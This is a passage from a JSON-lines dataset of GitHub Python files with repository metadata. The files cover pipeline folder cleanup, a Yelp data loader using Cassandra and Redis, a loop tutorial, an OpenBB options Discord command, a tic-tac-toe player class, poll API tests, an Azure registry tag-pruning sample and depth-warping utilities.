{str(function_name)}, downsample: {str(self.downsample)}\")\n\n function() # RUN FUNCTION\n\n end_time = timer()\n total_elapsed_time = round((end_time - start_time),2)\n print(f\" took {total_elapsed_time} seconds\")\n sep = \"*\" * 40 + \"\\n\"\n self.logevent(f\"{function_name} took {total_elapsed_time} seconds\\n{sep}\")\n\n def qc_cleanup(self):\n \"\"\"Post QC to clean up filesystem prior to re-running mask edits\"\"\"\n\n def background_del(org_path):\n try:\n basename = os.path.basename(os.path.normpath(org_path))\n new_path = os.path.join(org_path, \"..\", \".\" + str(basename))\n if os.path.exists(basename):\n os.rename(org_path, new_path)\n threading.Thread(target=lambda: shutil.rmtree(new_path)).start()\n else:\n print(f\"FOLDER ALREADY DELETED: {basename}\")\n except OSError as e:\n print(f\"FOLDER ALREADY DELETED: {new_path} {e}\")\n\n sep = \"*\" * 40 + \"\\n\"\n msg = f\"DELETE MASKED FILES FROM {self.fileLocationManager.thumbnail_masked}\"\n self.logevent(f\"{msg} \\n{sep}\")\n background_del(self.fileLocationManager.thumbnail_masked)\n\n def align_cleanup(self):\n \"\"\"\n THIS STEP IS RE-RUN IMAGE ALIGNMENT:\n DELETE FOLDERS:\n DELETE DB ENTRIES:\n \"\"\"\n\n def background_del(org_path):\n try:\n basename = os.path.basename(os.path.normpath(org_path))\n new_path = os.path.join(org_path, \"..\", \".\" + str(basename))\n if os.path.exists(basename):\n os.rename(org_path, new_path)\n threading.Thread(target=lambda: shutil.rmtree(new_path)).start()\n else:\n print(f\"FOLDER ALREADY DELETED: {basename}\")\n except OSError as e:\n print(f\"FOLDER ALREADY DELETED: {new_path} {e}\")\n\n sep = \"*\" * 40 + \"\\n\"\n thumbnail_aligned_dir = self.fileLocationManager.get_thumbnail_aligned()\n msg = f\"DELETE ALIGNED THUMBNAILS FILES FROM {thumbnail_aligned_dir}\"\n self.logevent(f\"{msg} \\n{sep}\")\n background_del(thumbnail_aligned_dir)\n\n thumbnail_cleaned_dir = self.fileLocationManager.get_thumbnail_cleaned()\n msg = f\"DELETE CLEANED THUMBNAILS FILES FROM {thumbnail_cleaned_dir}\"\n self.logevent(f\"{msg} \\n{sep}\")\n background_del(thumbnail_cleaned_dir)\n\n def ng_cleanup(self, downsample, channel):\n \"\"\"\n THIS STEP IS RE-RUN NEUROGLANCER:\n DELETE FOLDERS: neuroglancer_data\n DELETE DB ENTRIES: file_log\n \"\"\"\n\n def background_del(org_path):\n try:\n basename = os.path.basename(os.path.normpath(org_path))\n new_path = os.path.join(org_path, \"..\", \".\" + str(basename))\n if os.path.exists(org_path):\n os.rename(org_path, new_path)\n dirname = os.path.dirname(org_path)\n del_path = os.path.join(dirname, \".\" + str(basename))\n threading.Thread(target=lambda: shutil.rmtree(del_path)).start()\n else:\n print(f\"FOLDER ALREADY DELETED: {basename}\")\n except OSError as e:\n print(f\"FOLDER ALREADY DELETED: {new_path} {e}\")\n\n sep = \"*\" * 40 + \"\\n\"\n OUTPUT_DIR = self.fileLocationManager.get_neuroglancer(\n self.downsample, self.channel\n )\n msg = f\"DELETE NEUROGLANCER FILES FROM {OUTPUT_DIR}\"\n self.logevent(f\"{msg} \\n{sep}\")\n print(msg)\n background_del(OUTPUT_DIR)\n\n # OUTPUT_DIR = self.fileLocationManager.get_neuroglancer(\"True\", self.channel)\n # msg = f\"DELETE NEUROGLANCER FILES FROM {OUTPUT_DIR}\"\n # self.logevent(f\"{msg} \\n{sep}\")\n # print(msg)\n # background_del(OUTPUT_DIR)\n\n self.sqlController.clear_file_log(self.animal, self.downsample, self.channel)\n","repo_name":"ActiveBrainAtlas2/preprocessing-pipeline","sub_path":"archive/pipeline/lib/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":9816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"43669667698","text":"import pandas as pd\nimport numpy as np\nimport csv\n\ndf = pd.read_csv('yelp_business.csv')#.astype({'stars': 'string'})\n\nprint('Dataset loaded.')\n\nprint('Starting Cassandra...')\n\nfrom cassandra.cluster import Cluster\ncluster = Cluster(['cassandra'])\nsession = cluster.connect()\n\nsession.execute(\n \"CREATE KEYSPACE IF NOT EXISTS ks \"\n \"WITH REPLICATION = { 'class' : 'SimpleStrategy', 'replication_factor' : 3 };\"\n)\n\nsession.set_keyspace('ks')\n\nsession.execute(\"\"\"\nCREATE TABLE business(\n id text,\n name text,\n address text,\n city text,\n state text,\n stars float,\n review_count int,\n is_open int,\n categories text,\n hours text,\n PRIMARY KEY (id, name)\n);\n\"\"\")\n\nprint('Loading dataset to Cassandra...')\n\nquery = \"INSERT INTO business (id, name, address, city, state, stars, review_count, is_open, categories, hours) VALUES (?,?,?,?,?,?,?,?,?,?)\"\nprepared = session.prepare(query)\n\ntry:\n for index, item in df.iterrows():\n session.execute(prepared, (item[0], item[1], str(item[2]), item[3], item[4], item[8], item[9], item[10], item[11], item[12]))\nexcept OperationTimedOut:\n pass\n\n\nprint('Cassandra table loaded.')\n#print('Enter City to search for:') #prompt\n\nstate = input('Enter State to search for:')\n\nprint('Searching for restaurants in '+state+'...')\n\nquery = \"\"\"\nSELECT id, name, address, city, state, stars, review_count, is_open, categories, hours\nFROM business\nWHERE state = %s and is_open = 1\nALLOW FILTERING;\n\"\"\"\n\n#rows = session.execute(query, ('Tempe', )) # input example Tempe for city\nrows = session.execute(query, (state, ))\n\nprint('Search results found. Exporting...')\n\nheader = ['id','name', 'address', 'city', 'state', 'stars', 'review_count', 'categories', 'hours']\n\nwith open('test.csv', 'w') as fp:\n writer = csv.writer(fp, delimiter=',')\n writer.writerow(header)\n for row in rows:\n writer.writerow([row.id, row.name, row.address, row.city, row.state, row.stars, row.review_count, row.categories, row.hours])\n\nprint('Results exported to test.csv, starting subquery...')\n \nsession.execute(\"\"\"\nDROP TABLE business;\n\"\"\")\n\ncdf = pd.read_csv('test.csv')\n\nimport redis\nr = redis.Redis(host='my-redis', port=6379, db=0,decode_responses=True)\n\npipe = r.pipeline()\nfor i in range(len(cdf)):\n id_ = i\n pipe.hmset(id_, {'business_id': cdf['business_id'][i],\n 'name': cdf['name'][i],\n 'address': cdf['address'][i],\n 'city': cdf['city'][i], \n 'state': cdf['state'][i],\n 'stars': float(cdf['stars'][i]),\n 'review_count': int(cdf['review_count'][i]),\n 'categories': cdf['categories'][i],\n 'hours': cdf['hours'][i]})\n pipe.zadd(cdf['city'][i], {id_:i})\npipe.execute()\n\ncity = input('Enter City to search for:')\n\nwith open('test.json', 'w') as f:\n for x in r.zrangebyscore(city, 0, len(cdf)):\n pipe.hgetall(x)\n json.dump(pipe.execute(),f)\n\n","repo_name":"nap015/Yelp-Business-Search","sub_path":"dsc104final.py","file_name":"dsc104final.py","file_ext":"py","file_size_in_byte":2988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33283682772","text":"# Example 1\n# 'else' after for loop - executes after the for loop finishes (if not exited by 'break' !)\nfor n in range(2,10):\n for x in range (2, n):\n if n % x == 0:\n print(n, 'equals', x, '*', n//x)\n break\n else:\n print(n, 'is a prime number')\n\n\n# Example 2\n# 'continue' go to next iteration of the loop\nfor n in range(2,10):\n if n % 2 == 0:\n print(n, 'is even number')\n continue\n print(n, 'is odd number')\n\n# Example 3\n# Using copy of a list while iterating over it by slice [:]\n# Without the copy it would be infinite loop\nmylist = ['this', 'is', 'cool', 'construction']\nfor item in mylist[:]:\n if len(item)>5:\n mylist.insert(0, item)\nprint(mylist)\n","repo_name":"vafliik/pytutorials","sub_path":"for_tutorial.py","file_name":"for_tutorial.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15717988067","text":"import logging\nimport os\nimport time\nfrom functools import reduce\nfrom multiprocessing import Pool\n\nimport disnake\nimport numpy as np\nimport pandas as pd\nimport plotly.graph_objects as go\nimport yfinance as yf\n\nfrom bots import imps\nfrom openbb_terminal.decorators import log_start_end\nfrom openbb_terminal.stocks.options import op_helpers, yfinance_model\nfrom openbb_terminal.stocks.options.barchart_model import get_options_info\n\n# pylint: disable=W0640,W0631\nlogger = logging.getLogger(__name__)\n\n\ndef unpack(tup):\n\n return reduce(np.append, tup)\n\n\ncolumn_map = {\"openInterest\": \"oi\", \"volume\": \"vol\", \"impliedVolatility\": \"iv\"}\ncolumns = [\n \"strike\",\n \"bid\",\n \"ask\",\n \"volume\",\n \"openInterest\",\n \"impliedVolatility\",\n]\n\n\n# pylint: disable=R0912,R0913,R0914,R0915\n@log_start_end(log=logger)\ndef options_run(\n ticker,\n url,\n expiry,\n dates,\n df_bcinfo,\n calls,\n puts,\n df_opt,\n current_price,\n min_strike,\n max_strike,\n min_strike2,\n max_strike2,\n max_pain,\n):\n \"\"\"Options Overview\"\"\"\n titles, reports, embeds, embeds_img, choices, images_list = [], [], [], [], [], []\n fig = go.Figure()\n\n dmax = df_opt[[\"OI_call\", \"OI_put\"]].values.max()\n dmin = df_opt[[\"OI_call\", \"OI_put\"]].values.min()\n fig.add_trace(\n go.Scatter(\n x=df_opt.index,\n y=df_opt[\"OI_call\"],\n name=\"Calls\",\n mode=\"lines+markers\",\n line=dict(color=\"#00ACFF\", width=3),\n )\n )\n\n fig.add_trace(\n go.Scatter(\n x=df_opt.index,\n y=df_opt[\"OI_put\"],\n name=\"Puts\",\n mode=\"lines+markers\",\n line=dict(color=\"#e4003a\", width=3),\n )\n )\n fig.add_trace(\n go.Scatter(\n x=[current_price, current_price],\n y=[dmin, dmax],\n mode=\"lines\",\n line=dict(color=\"gold\", width=2),\n name=\"Current Price\",\n )\n )\n fig.add_trace(\n go.Scatter(\n x=[max_pain, max_pain],\n y=[dmin, dmax],\n mode=\"lines\",\n line=dict(color=\"grey\", width=3, dash=\"dash\"),\n name=f\"Max Pain: {max_pain}\",\n )\n )\n if imps.PLT_WATERMARK:\n fig.add_layout_image(imps.PLT_WATERMARK)\n fig.update_xaxes(\n range=[min_strike, max_strike],\n constrain=\"domain\",\n )\n fig.update_layout(\n margin=dict(l=0, r=0, t=60, b=20),\n template=imps.PLT_SCAT_STYLE_TEMPLATE,\n title=f\"Open Interest for {ticker.upper()} expiring {expiry}\",\n title_x=0.5,\n legend_title=\"\",\n xaxis_title=\"Strike\",\n yaxis_title=\"Open Interest (1k)\",\n xaxis=dict(\n rangeslider=dict(visible=False),\n ),\n font=imps.PLT_FONT,\n legend=dict(yanchor=\"top\", y=0.99, xanchor=\"left\", x=0.01),\n dragmode=\"pan\",\n )\n\n imagefile = \"opt-oi.png\"\n\n plt_link = \"\"\n if imps.INTERACTIVE:\n plt_link = imps.inter_chart(fig, imagefile, callback=False)\n reports.append(plt_link)\n\n fig.update_layout(\n width=800,\n height=500,\n )\n\n imagefile = imps.image_border(imagefile, fig=fig)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link_oi = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link_oi = imps.multi_image(imagefile)\n\n calls_df = calls[columns].rename(columns=column_map)\n calls_df = calls_df[calls_df[\"strike\"] >= min_strike2]\n calls_df = calls_df[calls_df[\"strike\"] <= max_strike2]\n calls_df[\"iv\"] = pd.to_numeric(calls_df[\"iv\"].astype(float))\n\n formats = {\"iv\": \"{:.2f}\"}\n for col, f in formats.items():\n calls_df[col] = calls_df[col].map(lambda x: f.format(x))\n\n calls_df = calls_df.fillna(\"\")\n calls_df.set_index(\"strike\", inplace=True)\n\n if \"^\" not in ticker:\n if \"-\" in df_bcinfo.iloc[0, 1]:\n iv = f\"```diff\\n- {df_bcinfo.iloc[0, 1]}\\n```\"\n else:\n iv = f\"```yaml\\n {df_bcinfo.iloc[0, 1]}\\n```\"\n\n pfix, sfix = f\"{ticker.upper()} \", f\" expiring {expiry}\"\n if expiry == dates[0]:\n pfix = f\"{ticker.upper()} Weekly \"\n sfix = \"\"\n\n titles.append(\n f\"{ticker.upper()} Overview\",\n )\n titles.append(\n f\"{pfix}Open Interest{sfix}\",\n )\n embeds.append(\n disnake.Embed(\n title=f\"{ticker.upper()} Overview\",\n color=imps.COLOR,\n ),\n )\n embeds.append(\n disnake.Embed(\n title=f\"{pfix}Open Interest{sfix}\",\n description=plt_link,\n colour=imps.COLOR,\n ),\n )\n choices.append(\n disnake.SelectOption(label=f\"{ticker.upper()} Overview\", value=\"0\", emoji=\"🟢\"),\n )\n choices.append(\n disnake.SelectOption(label=f\"{pfix}Open Interest{sfix}\", value=\"1\", emoji=\"🟢\"),\n )\n\n i, i2, end = 0, 0, 20\n df_calls = []\n dindex = len(calls_df.index)\n while i < dindex:\n df_calls = calls_df.iloc[i:end]\n df_calls.append(df_calls)\n figc = imps.plot_df(\n df_calls,\n fig_size=(1000, (40 + (40 * 20))),\n col_width=[3, 3, 3, 3],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n imagefile = \"opt-calls.png\"\n imagefile = imps.save_image(imagefile, figc)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link = imps.multi_image(imagefile)\n\n embeds_img.append(\n f\"{image_link}\",\n )\n titles.append(\n f\"{pfix}Calls{sfix}\",\n )\n embeds.append(\n disnake.Embed(\n title=f\"{pfix}Calls{sfix}\",\n colour=imps.COLOR,\n ),\n )\n i2 += 1\n i += 20\n end += 20\n\n # Add Calls page field\n i, page, puts_page = 2, 0, 3\n i3 = i2 + 2\n choices.append(\n disnake.SelectOption(label=\"Calls Page 1\", value=\"2\", emoji=\"🟢\"),\n )\n for i in range(2, i3):\n page += 1\n puts_page += 1\n\n embeds[i].add_field(name=f\"Calls Page {page}\", value=\"_ _\", inline=True)\n\n puts_df = puts[columns].rename(columns=column_map)\n\n puts_df = puts_df[puts_df[\"strike\"] >= min_strike2]\n puts_df = puts_df[puts_df[\"strike\"] <= max_strike2]\n\n puts_df[\"iv\"] = pd.to_numeric(puts_df[\"iv\"].astype(float))\n\n formats = {\"iv\": \"{:.2f}\"}\n for col, f in formats.items():\n puts_df[col] = puts_df[col].map(lambda x: f.format(x)) # pylint: disable=W0640\n\n puts_df = puts_df.fillna(\"\")\n puts_df.set_index(\"strike\", inplace=True)\n\n pfix, sfix = f\"{ticker.upper()} \", f\" expiring {expiry}\"\n if expiry == dates[0]:\n pfix = f\"{ticker.upper()} Weekly \"\n sfix = \"\"\n\n # Puts Pages\n i, end = 0, 20\n df_puts = []\n\n dindex = len(puts_df.index)\n while i < dindex:\n df_puts = puts_df.iloc[i:end]\n df_puts.append(df_puts)\n figp = imps.plot_df(\n df_puts,\n fig_size=(1000, (40 + (40 * 20))),\n col_width=[3, 3, 3, 3],\n tbl_header=imps.PLT_TBL_HEADER,\n tbl_cells=imps.PLT_TBL_CELLS,\n font=imps.PLT_TBL_FONT,\n row_fill_color=imps.PLT_TBL_ROW_COLORS,\n paper_bgcolor=\"rgba(0, 0, 0, 0)\",\n )\n imagefile = \"opt-puts.png\"\n imagefile = imps.save_image(imagefile, figp)\n\n if imps.IMAGES_URL or not imps.IMG_HOST_ACTIVE:\n image_link = imps.multi_image(imagefile)\n images_list.append(imagefile)\n else:\n image_link = imps.multi_image(imagefile)\n\n embeds_img.append(\n f\"{image_link}\",\n )\n titles.append(\n f\"{pfix}Puts{sfix}\",\n )\n embeds.append(\n disnake.Embed(\n title=f\"{pfix}Puts{sfix}\",\n colour=imps.COLOR,\n ),\n )\n i2 += 1\n i += 20\n end += 20\n\n # Add Puts page field\n i, page = 0, 0\n puts_page -= 1\n i2 += 2\n choices.append(\n disnake.SelectOption(label=\"Puts Page 1\", value=f\"{puts_page}\", emoji=\"🟢\"),\n )\n for i in range(puts_page, i2):\n page += 1\n embeds[i].add_field(name=f\"Puts Page {page}\", value=\"_ _\", inline=True)\n\n # Author/Footer\n for i in range(0, i2):\n embeds[i].set_author(\n name=imps.AUTHOR_NAME,\n url=imps.AUTHOR_URL,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n embeds[i].set_footer(\n text=imps.AUTHOR_NAME,\n icon_url=imps.AUTHOR_ICON_URL,\n )\n\n # Set images to Pages\n i = 0\n img_i = 0\n embeds[1].set_image(url=image_link_oi)\n for i in range(2, i2):\n embeds[i].set_image(url=embeds_img[img_i])\n img_i += 1\n i += 1\n\n if url:\n embeds[0].set_thumbnail(url=f\"{url}\")\n else:\n embeds[0].set_thumbnail(url=imps.AUTHOR_ICON_URL)\n\n # Overview Section\n if \"^\" not in ticker:\n reports.append(\n f\"{'':^5}*{df_bcinfo.iloc[0, 0]:^25}*{'':^5}*{df_bcinfo.iloc[1, 0]:^25}*{'':^5}\\n\"\n )\n reports.append(\n f\"{'':^8}{df_bcinfo.iloc[0, 1]:^25}{'':^5}{df_bcinfo.iloc[1, 1]:^25}\\n\"\n )\n i, i2 = 2, 3\n while i < 11:\n text = (\n f\"{'':^5}*{df_bcinfo.iloc[i, 0]:^25}*{'':^5}*{df_bcinfo.iloc[i2, 0]:^25}*{'':^5}\\n\"\n f\"{'':^5}{df_bcinfo.iloc[i, 1]:^30}{'':^5}{df_bcinfo.iloc[i2, 1]:^25}{'':^10}\\n\"\n )\n reports.append(text)\n i += 1\n i2 += 1\n\n embeds[0].add_field(name=f\"{df_bcinfo.iloc[0, 0]}\", value=iv, inline=False)\n embeds[0].add_field(\n name=f\"•{df_bcinfo.iloc[1, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[1, 1]}\\n```\",\n inline=True,\n )\n\n for N in range(2, 6):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].add_field(name=\"_ _\", value=\"_ _\", inline=False)\n for N in range(6, 8):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].add_field(name=\"_ _\", value=\"_ _\", inline=False)\n for N in range(8, 10):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].add_field(name=\"_ _\", value=\"_ _\", inline=False)\n for N in range(10, 12):\n embeds[0].add_field(\n name=f\"_ _ _ _ _ _ _ _ _ _ •{df_bcinfo.iloc[N, 0]}\",\n value=f\"```css\\n{df_bcinfo.iloc[N, 1]}\\n```\",\n inline=True,\n )\n\n embeds[0].set_footer(text=f\"Page 1 of {len(embeds)}\")\n\n return titles, reports, embeds, choices, embeds_img, images_list\n\n\n@log_start_end(log=logger)\ndef options_data(\n ticker: str = None,\n expiry: str = None,\n min_sp: float = None,\n max_sp: float = None,\n):\n\n # Debug\n if imps.DEBUG:\n logger.debug(\"opt overview %s %s %s %s\", ticker, expiry, min_sp, max_sp)\n\n # Check for argument\n if ticker is None:\n raise Exception(\"Stock ticker is required\")\n\n # Get options info/dates, Look for logo_url\n if \"^\" not in ticker:\n df_bcinfo = get_options_info(ticker) # Barchart Options IV Overview\n df_bcinfo = df_bcinfo.fillna(\"\")\n df_bcinfo = df_bcinfo.set_axis(\n [\n \" \",\n \"\",\n ],\n axis=\"columns\",\n )\n df_bcinfo[\"\"] = df_bcinfo[\"\"].str.lstrip()\n else:\n df_bcinfo = \"\"\n\n dates = yfinance_model.option_expirations(ticker) # Expiration dates\n tup = f\"{ticker.upper()}\"\n url = yf.Ticker(tup).info[\"logo_url\"]\n url += \"?raw=true\" if url else \"\"\n\n if not dates:\n raise Exception(\"Stock ticker is invalid\")\n\n options = yfinance_model.get_option_chain(ticker, str(expiry))\n calls = options.calls.fillna(0)\n puts = options.puts.fillna(0)\n\n current_price = yfinance_model.get_price(ticker)\n\n min_strike2 = np.percentile(calls[\"strike\"], 1)\n max_strike2 = np.percentile(calls[\"strike\"], 100)\n min_strike = 0.75 * current_price\n max_strike = 1.95 * current_price\n\n if len(calls) > 40:\n min_strike = 0.75 * current_price\n max_strike = 1.25 * current_price\n\n if min_sp:\n min_strike = min_sp\n min_strike2 = min_sp\n if max_sp:\n max_strike = max_sp\n max_strike2 = max_sp\n if min_sp > max_sp: # type: ignore\n min_sp, max_sp = max_strike2, min_strike2\n\n call_oi = calls.set_index(\"strike\")[\"openInterest\"] / 1000\n put_oi = puts.set_index(\"strike\")[\"openInterest\"] / 1000\n\n df_opt = pd.merge(call_oi, put_oi, left_index=True, right_index=True)\n df_opt = df_opt.rename(\n columns={\"openInterest_x\": \"OI_call\", \"openInterest_y\": \"OI_put\"}\n )\n\n max_pain = op_helpers.calculate_max_pain(df_opt)\n data = [\n ticker,\n url,\n expiry,\n dates,\n df_bcinfo,\n calls,\n puts,\n df_opt,\n current_price,\n min_strike,\n max_strike,\n min_strike2,\n max_strike2,\n max_pain,\n ]\n return data\n\n\n@log_start_end(log=logger)\ndef run(\n ticker: str = None,\n expiry: str = None,\n min_sp: float = None,\n max_sp: float = None,\n):\n cpus = os.cpu_count()\n data = options_data(ticker, expiry, min_sp, max_sp)\n with Pool(processes=cpus) as p:\n time.sleep(1)\n titles, reports, embeds, choices, embeds_img, images_list = zip(\n *p.starmap(options_run, [(*data,)], chunksize=1)\n )\n\n return (\n unpack(titles),\n unpack(reports),\n unpack(embeds),\n unpack(choices),\n unpack(embeds_img),\n unpack(images_list),\n )\n\n\n@log_start_end(log=logger)\ndef overview_command(\n ticker: str = None,\n expiry: str = None,\n min_sp: float = None,\n max_sp: float = None,\n):\n \"\"\"Options Overview\"\"\"\n\n titles, reports, embeds, choices, embeds_img, images_list = run(\n ticker, expiry, min_sp, max_sp\n )\n description = f\"```\\n{''.join(reports)}\\n```\"\n\n return {\n \"view\": imps.Menu,\n \"titles\": titles,\n \"description\": description,\n \"embed\": embeds,\n \"choices\": choices,\n \"embeds_img\": embeds_img,\n \"images_list\": images_list,\n }\n","repo_name":"rohankumardubey/OpenBBTerminal","sub_path":"bots/stocks/options/overview.py","file_name":"overview.py","file_ext":"py","file_size_in_byte":14958,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"41031506793","text":"import pygame\nimport config\n\nclass Player:\n def __init__(self,symbol,color) -> None:\n self.score=0\n self.color=color\n self.symbol=symbol\n\n def drawSymbol(self,posx,posy,screen):\n if(self.symbol=='O'):\n print(\"Turn for Player-1\")\n x=posx+config.BLOCKWIDTH//2\n y=posy+config.BLOCKHEIGHT//2\n radius=config.BLOCKWIDTH//2-10\n pygame.draw.circle(screen,self.color,(x,y),radius)\n #set the position of the circle to the middle of the clicked square \n # draw circle of radius half of the rectangle width -1\n return self.symbol\n elif(self.symbol=='X'):\n print(\"Turn for Player-2\")\n spacing=10\n pygame.draw.lines(screen, self.color, False, [(posx+spacing,posy+spacing),(posx+config.BLOCKWIDTH-spacing,posy+config.BLOCKHEIGHT-spacing)],10)\n #draw line from the left upper corner to lower right corner \n pygame.draw.lines(screen, self.color, False, [(posx+config.BLOCKWIDTH-spacing,posy+spacing),(posx+spacing,posy+config.BLOCKHEIGHT-spacing)], 10)\n #draws line form the right upper corner to lower left corner\n return self.symbol\n pass","repo_name":"jawad-003/TicTacToe","sub_path":"Player.py","file_name":"Player.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"42598910532","text":"\"\"\"\n Tests for Poll Resource\n\"\"\"\nimport json\n\nimport requests\n\nfrom sample import make_mock_poll, poll_url\nfrom test_setup import ApiTestCase\n\n\nclass PollTest(ApiTestCase):\n\n def test_create_poll(self):\n \"\"\"Test Poll Creation\"\"\"\n mock_request = make_mock_poll()\n _req = requests.post(poll_url, json=json.dumps(mock_request))\n req = json.loads(_req.json())\n expected = mock_request\n expected['total_votes'] = '8'\n self.assertDictEqual(req, expected)\n\n def test_poll_vote(self):\n \"\"\"Test Poll Vote via Patch\"\"\"\n # Create Test Poll\n mock_poll = make_mock_poll()\n _req = requests.post(poll_url, json=json.dumps(mock_poll))\n req = json.loads(_req.json())\n # Setup Fake 'Vote Action' for Poll\n mock_url = f\"{poll_url}/{req['pollId']}\"\n mock_request = {\n \"answers\": [\n {\n \"answerId\": \"0\",\n \"votes\": \"6\" # Increased from default 5\n },\n {\n \"answerId\": \"1\",\n \"votes\": \"3\"\n },\n ]\n }\n expected = req\n expected['answers'][0] = mock_request['answers'][0]\n expected['answers'][0]['answer'] = 'Yes'\n expected['total_votes'] = '9'\n _req = requests.patch(mock_url, json=json.dumps(mock_request))\n req = _req.json()\n self.assertDictEqual(req, expected)\n\n def test_poll_delete(self):\n \"\"\"Test Poll Deletion\"\"\"\n mock_poll = make_mock_poll()\n _req = requests.post(poll_url, json=json.dumps(mock_poll))\n mock_url = f\"{poll_url}/{mock_poll['pollId']}\"\n req = requests.delete(mock_url)\n self.assertEqual(req.status_code, 204)\n get_req = requests.get(mock_url)\n self.assertEqual(get_req.status_code, 404)\n","repo_name":"WarriorBeat/WarriorBeatApi","sub_path":"tests/test_poll.py","file_name":"test_poll.py","file_ext":"py","file_size_in_byte":1867,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"43108143836","text":"import asyncio\nfrom dotenv import find_dotenv, load_dotenv\nimport os\n\nfrom azure.containerregistry import TagOrder\nfrom azure.containerregistry.aio import ContainerRegistryClient\nfrom azure.identity.aio import DefaultAzureCredential\n\n\nclass DeleteTagsAsync(object):\n def __init__(self):\n load_dotenv(find_dotenv())\n\n async def delete_tags(self):\n # [START list_repository_names]\n audience = \"https://management.azure.com\"\n account_url = os.environ[\"CONTAINERREGISTRY_ENDPOINT\"]\n credential = DefaultAzureCredential()\n client = ContainerRegistryClient(account_url, credential, audience=audience)\n\n async with client:\n async for repository in client.list_repository_names():\n print(repository)\n # [END list_repository_names]\n\n # [START list_tag_properties]\n # Keep the three most recent tags, delete everything else\n tag_count = 0\n async for tag in client.list_tag_properties(repository, order_by=TagOrder.LAST_UPDATE_TIME_DESCENDING):\n tag_count += 1\n if tag_count > 3:\n await client.delete_tag(repository, tag.name)\n # [END list_tag_properties]\n\n\nasync def main():\n sample = DeleteTagsAsync()\n await sample.delete_tags()\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","repo_name":"mirespace/python-azure","sub_path":"sdk/containerregistry/azure-containerregistry/samples/async_samples/sample_delete_tags_async.py","file_name":"sample_delete_tags_async.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"21721664680","text":"import torch\n\nfrom vidar.utils.data import make_list, get_from_dict, update_dict\nfrom vidar.utils.flow_triangulation_support import bearing_grid, mult_rotation_bearing, triangulation\nfrom vidar.utils.tensor import pixel_grid, norm_pixel_grid, unnorm_pixel_grid, grid_sample\nfrom vidar.utils.types import is_dict, is_list\n\n\ndef warp_from_coords(tensor, coords, mode='bilinear', padding_mode='zeros'):\n \"\"\"Warp an image from a coordinate map\"\"\"\n # Sample grid from data with coordinates\n warp = grid_sample(tensor, coords.permute(0, 2, 3, 1), mode=mode, padding_mode=padding_mode)\n # Returned warped tensor\n return warp\n\n\ndef coords_from_optical_flow(optflow):\n \"\"\"Get coords from optical flow\"\"\"\n # Create coordinate with optical flow\n coords = pixel_grid(optflow, device=optflow) + optflow\n # Normalize and return coordinate grid\n return norm_pixel_grid(coords)\n\n\ndef warp_depth_from_motion(ctx_depth, ctx_cam, tgt_depth, tgt_cam,\n tgt_scnflow=None, tgt_world_scnflow=None,\n ctx_scnflow=None, ctx_world_scnflow=None):\n \"\"\"Warp depth map given motion between two cameras\"\"\"\n if is_list(ctx_depth) and is_list(tgt_depth):\n return [warp_depth_from_motion(\n ctx_depth[i], ctx_cam, tgt_depth[i], tgt_cam,\n None if tgt_scnflow is None else tgt_scnflow[i],\n None if tgt_world_scnflow is None else tgt_world_scnflow[i],\n None if ctx_scnflow is None else ctx_scnflow[i],\n None if ctx_world_scnflow is None else ctx_world_scnflow[i],\n ) for i in range(len(ctx_depth))]\n ctx_depth_warped = reproject_depth_from_motion(\n ctx_depth, ctx_cam, tgt_cam, ctx_scnflow=ctx_scnflow, ctx_world_scnflow=ctx_world_scnflow)\n return warp_from_motion(ctx_depth_warped, ctx_cam, tgt_depth, tgt_cam, tgt_scnflow, tgt_world_scnflow)\n\n\ndef reproject_depth_from_motion(ctx_depth, ctx_cam, tgt_cam, ctx_scnflow=None, ctx_world_scnflow=None):\n \"\"\"Reproject depth map given motion between two cameras\"\"\"\n ctx_points = ctx_cam.reconstruct_depth_map(\n ctx_depth, to_world=True, scene_flow=ctx_scnflow, world_scene_flow=ctx_world_scnflow)\n return tgt_cam.project_points(ctx_points, from_world=True, return_z=True)[1]\n\n\ndef warp_from_motion(ctx_rgb, ctx_cam, tgt_depth, tgt_cam, tgt_scnflow=None, tgt_world_scnflow=None):\n \"\"\"Warp image given motion between two cameras\"\"\"\n tgt_points = tgt_cam.reconstruct_depth_map(\n tgt_depth, to_world=True, scene_flow=tgt_scnflow, world_scene_flow=tgt_world_scnflow)\n return warp_from_coords(ctx_rgb, 